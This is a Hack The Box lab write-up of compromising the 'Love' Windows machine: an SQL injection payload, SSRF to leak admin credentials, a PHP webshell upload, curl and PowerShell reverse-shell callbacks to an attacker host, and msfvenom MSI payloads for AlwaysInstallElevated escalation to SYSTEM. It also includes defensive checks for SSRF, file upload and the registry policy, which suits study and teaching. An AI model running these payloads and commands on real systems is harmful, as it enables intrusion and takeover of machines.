# Love — Hack The Box
| Info | Value |
|---|---|
| OS | Windows 10 Pro 19042 |
| Difficulty | Easy |
| IP | 10.129.48.103 |
| Hostname | love.htb, staging.love.htb |
| Services | HTTP/Apache (80,443,5000), SMB (445), MySQL/MariaDB (3306), WinRM (5985,5986), MSRPC (135) |
## Enumeration

### Nmap

```
nmap -sC -sV -p- -vvv -oA scan/nmap.scan love.htb
```

```
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.46
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=staging.love.htb/emailAddress=roy@love.htb
| organizationName=ValentineCorp
445/tcp  open  microsoft-ds  Windows 10 Pro 19042
3306/tcp open  mysql         MariaDB 10.3.24 or later (unauthorized)
5000/tcp open  http          Apache httpd 2.4.46
|_http-title: 403 Forbidden
5040/tcp open  unknown
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (WinRM-S)
7680/tcp open  pando-pub?
```

Info from the SSL certificate (port 443):

- CN: staging.love.htb — new vhost
- Email: roy@love.htb — first user found
- Org: ValentineCorp
### VHost Enumeration

See also: Subdomain Enumeration

```
ffuf -H "Host: FUZZ.love.htb" \
     -H "User-Agent: PENTEST" \
     -c \
     -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -u http://love.htb/ \
     -fs 4388
```

```
staging [Status: 200, Size: 5357, Words: 1543, Lines: 192]
```

Added to /etc/hosts:

```
sudo tee -a /etc/hosts <<< "10.129.48.103 staging.love.htb"
```

The SSL certificate already confirmed staging.love.htb, but vhost fuzzing with ffuf is the correct way to discover it without relying on the certificate.
SMB signing not required:

```
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
```

### Port 5000

Returns 403 Forbidden from outside — accessible only from localhost (relevant for SSRF).
### Directory Bruteforce — love.htb

```
feroxbuster -u http://love.htb/ -x js,html,php,txt,json,docx -o scan/root.dir
```

Relevant results:
| Status | Path |
|---|---|
| 200 | / (Voting System login) |
| 301 | /admin/ |
| 301 | /images/ |
| 301 | /includes/ |
| 301 | /plugins/ |
| 302 | /login.php → index.php |
| 302 | /home.php → index.php |
| 302 | /admin/login.php → index.php |
| 0 | /includes/conn.php (DB connection) |
### Application

Voting System using PHP — admin panel at /admin/, login at index.php.
### SQLi on Voting System (not necessary)

sqlmap confirmed a time-based blind SQLi on the voter parameter of the login form:

```
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voter=' AND (SELECT 2697 FROM (SELECT(SLEEP(5)))NKid) AND 'vZkn'='vZkn&password=asd&login=
```

Note: the SQLi is real but not the optimal path. Time-based blind extraction is slow (one character at a time); admin credentials are obtained much faster via SSRF.
## Foothold

### SSRF on staging.love.htb — Admin credentials leak

See also: 0 — Initial Recon

The vhost staging.love.htb (found in the SSL certificate) exposes a Free File Scanner whose /beta.php endpoint accepts arbitrary URLs and displays their content (SSRF).
#### Step 1 — Internal port scan via SSRF

Port fuzzing of local ports using Burp Intruder:

```
POST /beta.php HTTP/1.1
Host: staging.love.htb
Content-Type: application/x-www-form-urlencoded

file=http://127.0.0.1:§PORT§/&read=Scan+file
```

Port 5000 (403 from outside) returns content when accessed from localhost.
#### Step 2 — Access to localhost:5000

```
POST /beta.php HTTP/1.1
Host: staging.love.htb
Content-Type: application/x-www-form-urlencoded

file=http://127.0.0.1:5000/&read=Scan+file
```

The response contains a Password Dashboard with plaintext credentials:

```
Vote Admin Creds admin: @LoveIsInTheAir!!!!
```

| Username | Password | Service |
|---|---|---|
| admin | @LoveIsInTheAir!!!! | Voting System (/admin/) |

#### Step 3 — Login to admin panel

Log in at http://love.htb/admin/login.php with admin : @LoveIsInTheAir!!!! → lands on http://love.htb/admin/home.php.
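The root cause above is that beta.php fetches whatever URL it is given, so the server itself becomes the client for 127.0.0.1:5000. The following is an added example (not code from the writeup or from the Voting System) of the fetch-side guard that was missing: it resolves the target, checks every resulting address, and refuses loopback, private and link-local ranges, failing closed when the name cannot be resolved. The function name and the injectable resolver are assumptions for this example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Added example, not code from the writeup or the Voting System: the guard
# beta.php lacks. Every address a URL points at is checked, so a hostname
# that resolves to 127.0.0.1 is refused like the literal, and anything
# that cannot be resolved fails closed. Function name and resolver
# parameter are assumptions for this example.

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host):
    """All IPv4/IPv6 addresses for host via socket.getaddrinfo, [] on failure."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def is_safe_fetch_url(url, resolver=resolve_all):
    """True only if url is http(s) and every resolved address is globally routable."""
    try:
        parts = urlparse(url)
    except ValueError:          # e.g. malformed IPv6 brackets
        return False
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname
    try:
        ipaddress.ip_address(host)
        addrs = [host]          # plain literal, including bracketed IPv6
    except ValueError:
        # A DNS name, or a form such as "127.1" or "2130706433" that the OS
        # resolver still maps to loopback: ask the resolver and judge the result.
        addrs = resolver(host)
    if not addrs:
        return False            # unresolvable: fail closed
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:      # scoped or otherwise unparsable address
            return False
        if not ip.is_global or ip.is_multicast:
            return False
    return True
```

A name that resolves to both a public and a loopback address is rejected, since one bad address is enough to reach localhost:5000.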
### RCE via File Upload — Voting System

The Voting System admin panel allows uploading a profile image via /admin/profile_update.php. There is no file type validation → PHP webshell upload.

#### Step 1 — Webshell upload

From the admin panel, click on the username (“Neovic Devierte”) to open the profile update. Upload a webshell as the profile picture:

```php
<?php system($_REQUEST['cmd']);?>
```

The file is saved as /images/pwn.php.
#### Step 2 — RCE confirmation

Test callback with curl:

```
GET /images/pwn.php?cmd=curl+<ATTACKER_IP> HTTP/1.1
Host: love.htb
```

```
┌──(sverz1㉿sverz1)-[~/…/HTB/Machines/Easy/Love]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [<ATTACKER_IP>] from (UNKNOWN) [10.129.48.103] 55620
GET / HTTP/1.1
Host: <ATTACKER_IP>
User-Agent: curl/7.55.1
Accept: */*
```

RCE confirmed.
#### Step 3 — Reverse shell

Base64-encoded PowerShell reverse shell (powershell -e <B64>):

```
GET /images/pwn.php?cmd=powershell+-e+<BASE64_PAYLOAD> HTTP/1.1
Host: love.htb
```

```
┌──(sverz1㉿sverz1)-[~/…/HTB/Machines/Easy/Love]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [<ATTACKER_IP>] from (UNKNOWN) [10.129.48.103] 55624
whoami
love\phoebe
PS C:\xampp\htdocs\omrs\images>
```

Shell as love\phoebe. User flag in C:\Users\phoebe\Desktop\user.txt.
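The upload in profile_update.php accepts any file and stores it under the client's own name inside a directory Apache executes PHP from. As an added example (not code from the Voting System or the writeup), the checks below are the ones that would have stopped pwn.php: an extension allowlist judged on the final extension only, magic-byte verification against that extension, refusal of PHP tags anywhere in the body, and a random stored name. validate_profile_image and upload_allowed are names assumed for this example.

```python
import os
import secrets

# Added example, not code from the Voting System or the writeup: the
# server-side checks profile_update.php lacks. A file is accepted only if its
# extension is an image type AND its leading bytes match that type, PHP tags
# anywhere in the body are refused, and the stored name is random rather than
# the client-supplied one. Function names are assumptions for this example.

# Leading bytes (magic numbers) of the image types a profile picture may be.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024


def validate_profile_image(filename, data):
    """Return a safe random filename for data, or raise ValueError."""
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    # Only the final extension counts, so "pwn.png.php" is judged by "php".
    ext = os.path.splitext(os.path.basename(filename))[1].lower().lstrip(".")
    if ext not in IMAGE_SIGNATURES:
        raise ValueError("extension not allowed: %r" % ext)
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        raise ValueError("content does not match a %s image" % ext)
    # A genuine image can still carry PHP in a comment or trailing bytes; on a
    # host that runs PHP from the upload directory, refuse such files outright.
    if b"<?php" in data or b"<?=" in data:
        raise ValueError("embedded PHP tag")
    # Never reuse the client's name: a random one defeats predictable URLs
    # such as /images/pwn.php.
    return "%s.%s" % (secrets.token_hex(16), ext)


def upload_allowed(filename, data):
    """Boolean wrapper around validate_profile_image for callers and tests."""
    try:
        validate_profile_image(filename, data)
    except ValueError:
        return False
    return True
```

Serving the upload directory with PHP execution disabled (or from a host that never runs PHP) is the complementary control; the content checks above do not replace it.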
## Privilege Escalation

### AlwaysInstallElevated → SYSTEM

#### Vulnerability

AlwaysInstallElevated — when both registry keys (HKLM and HKCU) are set to 1, any user can install .msi packages with NT AUTHORITY\SYSTEM privileges. It is sufficient to generate a malicious MSI with msfvenom.

See also: PrivilegeEscalationWindows

Ref: https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/
#### Step 1 — Check registry keys

```
PS C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

PS C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
```

Both at 0x1 → exploitable.
#### Step 2 — Generate malicious MSI

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=443 -f msi -o evil.msi
```

#### Step 3 — Transfer to target

```
# Attacker: HTTP server
python3 -m http.server 9999
```

```
# Target: download
(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>:9999/evil.msi','C:\Users\Phoebe\Documents\evil.msi')
```

#### Step 4 — Execute and get SYSTEM

```
# Attacker: listener
nc -nvlp 443
```

```
# Target: install silently
msiexec /quiet /qn /i C:\Users\Phoebe\Documents\evil.msi
```

```
C:\WINDOWS\system32> whoami
nt authority\system
```

Root flag in C:\Users\Administrator\Desktop\root.txt.
### Alternative — Privesc without reverse shell

You can use an MSI that executes a direct command (e.g., adding the user to the Administrators group) instead of a reverse shell:

```
msfvenom -p windows/exec CMD='net localgroup administrators phoebe /add' -f msi -o adduser.msi
```

Transfer and execute with msiexec /quiet /qn /i adduser.msi, then log out and log in again to gain admin privileges.

Logout is required: after adding the user to the Administrators group, the new privileges are not active in the current session. You must disconnect and reconnect (e.g., a new evil-winrm session or a new reverse shell).
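The two reg query results in Step 1 are exactly what a host audit should be looking for, and the policy is only dangerous when both hives agree. The following is an added example (not part of the writeup) that parses that reg query output, treats an absent value or a "system was unable to find" error as 0, and reports whether the combination is exploitable; the remediation is to set both values to 0 (Group Policy "Always install with elevated privileges" disabled). Function names and the sample outputs are constructed for this example.

```python
import re

# Added example, not part of the writeup: a defender-side audit that reads the
# output of the two "reg query" commands shown in Step 1 and reports whether
# the AlwaysInstallElevated policy is exploitable. Windows Installer honours
# the policy only when BOTH the HKLM and HKCU values are 1; a missing value or
# an error line counts as 0. Function names are assumptions for this example.

_VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)")


def parse_always_install_elevated(reg_query_output):
    """DWORD value from 'reg query ... /v AlwaysInstallElevated' output, 0 if absent."""
    match = _VALUE_RE.search(reg_query_output)
    if match is None:
        # Covers "ERROR: The system was unable to find the specified registry
        # key or value." as well as an empty key: the policy is not set.
        return 0
    return int(match.group(1), 16)


def assess_always_install_elevated(hklm_output, hkcu_output):
    """Combine both hives the way Windows Installer does; 1 in both = exploitable."""
    hklm = parse_always_install_elevated(hklm_output)
    hkcu = parse_always_install_elevated(hkcu_output)
    return {
        "hklm": hklm,
        "hkcu": hkcu,
        "exploitable": hklm == 1 and hkcu == 1,
        # Remediation: set both to 0 (GPO "Always install with elevated
        # privileges" = Disabled) under Computer and User Configuration.
        "remediation_needed": hklm == 1 or hkcu == 1,
    }


# Constructed sample outputs, modelled on the two queries in Step 1.
SAMPLE_HKLM = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU_UNSET = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    print(assess_always_install_elevated(SAMPLE_HKLM, SAMPLE_HKCU))
```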
## Attack Chain Summary

```
Nmap → SSL certificate reveals roy@love.htb
│ ffuf vhost fuzzing → staging.love.htb
│
↓
staging.love.htb/beta.php → SSRF (File Scanner)
│ Internal port fuzzing via Intruder
↓
SSRF on http://127.0.0.1:5000/ → Password Dashboard
│ admin : @LoveIsInTheAir!!!!
↓
Login Voting System /admin/ → admin panel
│
↓
Upload PHP webshell via profile picture → /images/pwn.php
│ RCE confirmed with curl callback
↓
Reverse shell PowerShell base64 → love\phoebe → user flag
│
↓
AlwaysInstallElevated (HKLM + HKCU = 0x1)
│ msfvenom MSI reverse shell → msiexec /quiet /qn /i
↓
NT AUTHORITY\SYSTEM → root flag
```